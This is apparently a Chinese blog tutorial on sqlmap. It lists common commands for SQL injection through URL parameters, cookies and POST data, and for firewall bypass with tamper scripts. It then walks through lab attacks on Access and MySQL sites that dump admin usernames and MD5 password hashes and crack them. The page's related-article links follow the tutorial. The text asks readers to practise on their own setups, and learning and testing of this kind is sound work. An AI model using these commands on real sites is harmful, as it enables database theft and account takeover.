sqlmap常用命令总结:

注意:命令为kali linux中运行的 (windows中用python sqlmap.py执行)

1#、注入六连:

1.   sqlmap -u  "http://www.xx.com?id=x"    【查询是否存在注入点

2.     --dbs         【检测站点包含哪些数据库

3.     --current-db    【获取当前的数据库名

4.     --tables -D "db_name"  【获取指定数据库中的表名 -D后接指定的数据库名称

5.     --columns  -T "table_name" -D "db_name"  【获取数据库表中的字段

6.     --dump -C "columns_name" -T "table_name" -D "db_name"  【获取字段的数据内容

2#、COOKIE注入:

sqlmap -u "http://www.xx.com?id=x" --cookie "cookie" --level 2  【cookie注入 后接cookie值

3#、POST注入:

  • (1)目标地址http:// www.xxx.com /login.asp
  • (2)打开brup代理。
  • (3)点击表单提交
  • (4)burp获取拦截信息(post)
  • (5)右键保存文件(.txt)到指定目录下
  • (6)运行sqlmap并执行如下命令:

用例:sqlmap -r okay.txt  -p  username

// -r表示加载文件(及步骤(5)保存的路径),-p指定参数(即拦截的post请求中表单提交的用户名或密码等name参数)

(7)自动获取表单--forms自动获取表单

例如:sqlmap -u www.xx.com/login.asp --forms

(8)指定参数搜索:--data

例如:sqlmap -u www.xx.com/login.asp --data "username=1"

4#、常用指令:

1.    --purge      【重新扫描(--purge 删除原先对该目标扫描的记录)

2.    --tables      【获取表名

3.     --dbs         【检测站点包含哪些数据库

4.     --current-db    【获取当前的数据库名

5.     --current-user  【检测当前用户

6.    --is-dba   【判断站点的当前用户是否为数据库管理员

7.    --batch      【默认确认,不询问你是否输入

8.    --search  【后面跟参数 -D -T -C 搜索列(C),表(T)和或数据库名称(D)

9.    --threads 10  【线程,sqlmap线程最高设置为10

10.  --level 3        【sqlmap默认测试所有的GET和POST参数,当--level的值大于等于2的时候也会测试HTTP Cookie头
                                的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。最高为5
11.  --risk 3           【执行测试的风险(0-3,默认为1)risk越高,越慢但是越安全

12.     -v   【详细的等级(0-6)
          0:只显示Python的回溯,错误和关键消息。
          1:显示信息和警告消息。
          2:显示调试消息。
          3:有效载荷注入。
          4:显示HTTP请求。
          5:显示HTTP响应头。
          6:显示HTTP响应页面的内容

13.    --privileges  【查看权限

14.   --tamper xx.py,cc.py   【防火墙绕过,后接tamper库中的py文件

15.  --method "POST" --data "page=1&id=2"   【POST方式提交数据

16.  --threads number  【采用多线程 后接线程数

17.  --referer  ""  【使用referer欺骗

18.  --user-agent ""     【自定义user-agent

19.  --proxy “目标地址″   【使用代理注入

sqlmap常用路径:

1. 添加表字段的目录在/usr/share/sqlmap/txt/common-tables.txt

2. 存放扫描记录的目录在/root/.sqlmap/output

环境准备:

1. Vmware虚拟机

2. 渗透环境:Kali linux (本地版本2018.4)(windows下安装python2和sqlmap也可进行实验)

3. web环境:windos2003 server

(建议学习搭建自己的web环境进行实验攻击,切勿拿别人网站做实验)

注入实战之Access:

温馨提醒:注重自己搭环境进行实战测试,勿对其他网站进行破坏测试。

1. 寻找注入点

2.  可先进行手工测试是否存在漏洞

3. 发现可以注入漏洞,便可手工注入,本文展示sqlmap工具的注入使用

使用命令:sqlmap -u "http://192.168.96.16/shownews.asp?id=23"

得到扫描结果:扫描类型盲注,id存在注入点,服务器使用的数据库为Access

4.列出所有的表(获取表)

使用指令:sqlmap -u "http://192.168.96.16/shownews.asp?id=23" --tables --purge

得到爆破出的表名:

注意在此manage_user为管理员的表,对我们有用的表。但是这个manage_user字符串在sqlmap的爆破表中是不存在的,

是我后面手工添加的字段,

sqlmap中添加表名字段的目录在/usr/share/sqlmap/txt/common-tables.txt中

5. 获取表中的字段(获取列):

sqlmap -u "http://192.168.96.16/shownews.asp?id=23" --columns -T "manage_user"

(--columns为获取列字段,-T为指定的表名)

6. 获取列字段的内容

使用指令:sqlmap -u "http://192.168.96.16/shownews.asp?id=23" --dump -C "username,password" -T "manage_user"

(--dump 打印出来 -C 后接需要获取的字段名 -T为指定的表名)

得到用户名admin以及经过md5加密过后的密码3acdbb255b45d296,百度md5破解得密码0791idc

自此,sqlmap对Access数据库的使用结束。

注入实战之Mysql:

温馨提醒:注重自己搭环境进行实战测试,勿对其他网站进行破坏测试。

1.手工寻找注入点

2. sqlmap检查注入点

使用命令:sqlmap -u "192.168.96.16/info_show.php?info_id=138"

检查出是mysql数据库,询问是否跳过对其他类型数据库的检测,选择Y 跳过。

检测等级与风险等级为一,共三级,越高检测越复杂的数据库信息。

检测结果得到info_id存在注入点,注入类型为盲注,数据库为Mysql。

3. 检测使用的数据库

使用指令:sqlmap -u "192.168.96.16/info_show.php?info_id=138" --current-db

4. 检测数据库中的表名(获取表)

使用指令:  sqlmap -u "192.168.96.16/info_show.php?info_id=138" --tables -D "govcn"

5. 检测表中的字段名(获取列)

使用指令:  sqlmap -u "192.168.96.16/info_show.php?info_id=138" --columns -T "admin" -D "govcn"

6. 获取字段内容

使用指令:sqlmap -u "192.168.96.16/info_show.php?info_id=138" --dump -C "username,password" -T "admin" -D "govcn"

得到用户名admin,以及md5加密后的密码,百度md5破解得到密码为admin。

至此,sqlmap实战对于mysql的应用到此结束。

OK~大功告成

  • 若有错误或不妥之处劳烦大伙们指出,虚心求教,收到后及时改正!!!

Sqlmap常用命令总结及注入实战(Access、mysql)相关推荐

  1. Web安全工具—Sqlmap常用命令和参数(持续更新)

    Web安全工具-SQLMAP常用命令和参数 简介:此篇文章主要记录学习注入神器sqlmap的过程,文章会对常见参数进行详解(附图),适合入门学习. 一:SQLMAP介绍: 简介:sqlmap是一个由p ...

  2. sqlmap 常用命令

    常用命令 -u 指定目标URL (可以是http协议也可以是https协议) -d 连接数据库 –dbs 列出所有的数据库 –current-db 列出当前数据库 –tables 列出当前的表 –co ...

  3. SQLmap常用命令/使用教程

    SQLmap是一款自动化SQL注入神器,用于SQL注入漏洞的检测和利用,支持多种数据库 检测位置 -u -- 指定url(GET请求) -p -- 指定参数(url包含多个参数时,指定参数) --da ...

  4. SQLMap使用|命令大全(干货)

    SQLMap简介 SQLMap是一款开源的渗透测试工具,它可以自动检测和利用SQL注入漏洞,并对数据库执行相应的攻击. SQLMap的强大的功能包括:数据库指纹识别.数据库枚举.数据提取.密码hash ...

  5. Mysql常用命令行大全

    Mysql常用命令行大全 第一招.mysql服务的启动和停止 net stop mysql net start mysql 第二招.登陆mysql 语法如下: mysql -u用户名 -p用户密码 键 ...

  6. mysql数据库管理-常用命令总结

    mysql常用命令行大全 1.连接Mysql 格式: mysql -h主机地址 -u用户名 -p用户密码 1.连接到本机上的MYSQL. 首先打开DOS窗口,然后进入目录mysql\bin,再键入命令 ...

  7. Mysql运维常用命令回顾整理

    一.前景 Mysql作为开源数据库的中坚力量之一,虽然目前已被甲骨文收购,面临闭源风险,但是mysql扔是我们运维工作中最常面对的工作,那如何做好mysql运维工作,甚至做好mysql的基础运维,都是 ...

  8. mysql常用命令行操作-linux

    mysql常用命令行操作-linux 1. mysql -h 192.168.1.1 -u root -p 123456 -h意思是数据库所在服务器ip地址 -u是数据库用户名 -p是数据库密码 2. ...

  9. MySQL创建数据库及常用命令

    一 配置MySQL Server 配置MySQL Server之后可以在cmd窗口中直接使用MySQL的命令.配置方式如下: 在系统环境变量中添加一条path路径:C:\Program Files\M ...

  10. Sysbench常用命令

    1 Sysbench 安装 requirements yum -y install make automake libtool pkgconfig libaio-devel# For MySQL su ...

最新文章

  1. python简单装饰器_简单介绍Python装饰器(一)
  2. 分析mysql日志文件_MySQL日志文件与分析
  3. js获取网页当前页面及路径
  4. Study 1 —— HTML5概述
  5. C++11并发实战(专栏)
  6. 据说,很多搞科研的硕博生,都容易产生以下20个错觉,看看你中了几枪?
  7. 5.4 self-attention以及mask操作的实现
  8. LINQ分组查询统计
  9. #《机器学习》_周志华(西瓜书)南瓜书_第4章 决策树
  10. H3C交换机SSH配置完全攻略
  11. Android Animation之TranslateAnimation(平移动画)
  12. 20多个好用的 Vue 组件库
  13. Open-DrainPush-Pull
  14. python的pth打开方式_python .pth 文件 和 site 模块
  15. vue项目部署新浪云
  16. ABAP如何把任意数值类型转化为CHAR类型
  17. python函数**什么意思_python中函数的参数是什么意思
  18. C# dotnet 一个看上去还能用的二进制序列化帮助类
  19. Django自研告警平台-让告警排好队
  20. 近五年中文电子病历命名实体识别研究进展

热门文章

  1. 在RStudio中调用python包
  2. 移动端车牌识别sdk-手机拍照识别车牌技术
  3. 全国车辆限行查询api 全国限行限号数据服务
  4. 今日制造怎么安装solidworks插件_PS插件安装后出现了登陆界面,无法使用怎么解决?保证一招搞定...
  5. python pdb模块_Biopython PDB模块
  6. 十大排序算法(Top 10 Sorting Algorithms)
  7. 快速解决Ubuntu无法访问Windows分区的问题
  8. turtle库 科赫雪花(bug)的绘制
  9. 基于FPGA的VGA显示,简单的历程和注释(DE2-115)
  10. 欢迎使用云-“您的Apple ID已被禁用。”